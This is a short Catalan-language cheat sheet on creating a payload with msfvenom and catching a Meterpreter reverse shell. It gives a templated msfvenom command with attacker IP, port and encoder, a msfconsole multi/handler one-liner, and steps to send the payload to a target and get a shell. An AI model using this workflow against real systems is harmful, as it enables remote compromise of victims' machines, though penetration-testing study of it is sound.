Generació d'un Payload amb MSFVenom
Format #
-p payload
lhost=IPAtacant
lport=IPAtacant
-f formatdesti(Per exemple exe)
-o fitxerdestí
Pas1: Generar un payload #
msfvenom -a ArquitecturaOncorrerà --platform plataforma -p payload --LHOST IPAtacant LPORT PORTAtacant -e encoder -f format -o output
Pas2: arrancar el procés que escolta #
- exemple
msfconsole -x "use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST IP; set LPORT port; run; exit .y"
- També pots arrancar el metasploit i executar-lo manualment. Has de vigilar que els paràmetres es corresponguin al del payload
Pas3 i 4: enviar el payload / rebre shell #
- enviem el payload
- L'executa i inmediatament tenim accés a la shell
Alternativa MSFVenom Payload Creator #
- msfpc és un script interactiu per a crear payloads que utilitza msfvenom com a motor